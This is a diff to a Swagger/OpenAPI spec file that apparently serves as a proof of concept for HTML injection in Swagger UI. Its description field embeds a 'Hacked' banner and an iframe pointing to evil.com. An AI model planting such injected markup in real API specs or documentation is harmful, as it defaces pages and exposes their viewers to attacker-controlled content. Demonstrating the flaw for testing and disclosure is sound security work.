--- a/xss.yaml
+++ b/xss.yaml
@@ -1,10 +1,10 @@
 swagger: '2.0'
 info:
   version: 1.0.0
-  title: Html Injection 
+  title: Swagger Ui Vulnerable to Html Injection 
   description: '<div class="login-form">
     <div class="heading">
-        <h1 style="font-size:50px">HTML Injection : Hacked </h1>
+        <h1 style="font-size:50px;color:red">HTML Injection : Swagger Ui Hacked </h1>
     </div>
   <iframe src="https://evil.com" style="height:400px;width:700px" title="Iframe Example"></iframe>
 </div>'
